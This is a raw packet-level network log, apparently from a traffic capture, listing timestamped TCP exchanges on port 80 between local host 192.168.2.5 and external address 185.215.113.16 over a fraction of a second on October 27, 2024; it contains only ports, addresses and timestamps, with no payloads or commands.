Oct 27, 2024 12:13:22.140436888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140472889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140506983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140513897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.140539885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140553951 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.140573025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140605927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140620947 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.140640974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140672922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140686989 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.140708923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.140754938 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141210079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141243935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141278028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141297102 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141311884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141350031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141360998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141367912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141395092 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141408920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141443014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141482115 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141489029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141521931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141556025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141581059 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.141601086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.141674995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142051935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142112017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142163038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142208099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142210007 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142241001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142277002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142287970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142290115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142324924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142357111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142363071 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142363071 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142391920 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142426014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142469883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.142471075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.142613888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143098116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143131971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143165112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143201113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143223047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143234015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143280029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143335104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143335104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143342972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143383026 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143415928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143450022 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143459082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143506050 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.143511057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143544912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143578053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.143588066 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144009113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144042015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144063950 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144074917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144109011 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144118071 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144153118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144186974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144212961 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144220114 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144253969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144288063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144310951 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144320965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144354105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144366026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144388914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.144404888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.144992113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145025969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145071983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145103931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145109892 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145109892 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145149946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145184994 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145220995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145232916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145253897 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145266056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145284891 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145299911 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145334005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145366907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.145405054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145405054 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.145957947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146003962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146035910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146039009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146069050 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146101952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146136045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146138906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146138906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146168947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146207094 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146214008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146248102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146292925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146297932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146326065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146367073 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146370888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146673918 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146708965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146742105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146760941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146778107 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146811008 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146811962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146845102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146878004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146898985 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146912098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146945000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146965981 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.146979094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.146996975 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147011995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147046089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147078991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147103071 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147125006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147164106 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147553921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147588015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147622108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147644043 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147665977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147682905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147699118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147732973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147738934 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147766113 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147799015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147830963 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147831917 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147871971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147881985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147883892 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147914886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147933960 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147949934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.147985935 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.147994995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148035049 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148121119 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148461103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148494959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148529053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148561954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148595095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148602009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148627996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148659945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148670912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148670912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148693085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148726940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148734093 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148760080 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148792982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148825884 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148844957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148859978 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148900032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148905039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148909092 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148945093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.148974895 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.148976088 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149226904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149445057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149478912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149506092 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149512053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149544954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149553061 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149578094 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149612904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149626017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149629116 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149660110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149692059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149710894 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149727106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149760962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149769068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149806023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149827003 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.149840117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149873972 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.149950981 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150239944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150274038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150280952 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150305986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150347948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150393009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150574923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150626898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150660038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150669098 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150692940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150702000 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150742054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150775909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150810003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150837898 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150844097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150876999 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150886059 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150927067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150935888 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.150959969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.150993109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151026011 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151036978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151060104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151093960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151099920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151206970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151626110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151660919 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151695013 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151737928 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151745081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151777983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151860952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151895046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151928902 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151932955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151932955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.151962042 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.151995897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152019024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152033091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152036905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152045012 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152077913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152112007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152129889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152143955 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152178049 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152273893 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152354956 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152363062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152401924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152436018 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152442932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.152475119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152486086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.152514935 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.205955982 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.303488970 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309196949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309269905 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309305906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309357882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309391975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309400082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309400082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309426069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309461117 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309473038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309592962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309626102 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309659958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309694052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309700012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309700012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309919119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309952021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.309962034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.309986115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310018063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310075998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310085058 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310113907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310151100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310187101 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310187101 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310447931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310481071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310513020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310545921 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310578108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310589075 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310589075 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310611010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310645103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310678959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310687065 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310712099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310743093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310775042 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310776949 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310798883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310808897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310842991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.310851097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.310906887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311012983 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.311309099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311378002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311412096 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311444044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311455011 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.311476946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311507940 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.311510086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311542988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311554909 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.311575890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311608076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311650991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:22.311695099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311728954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311764002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:22.311832905 CET	49712	80	192.168.2.5	185.215.113.16
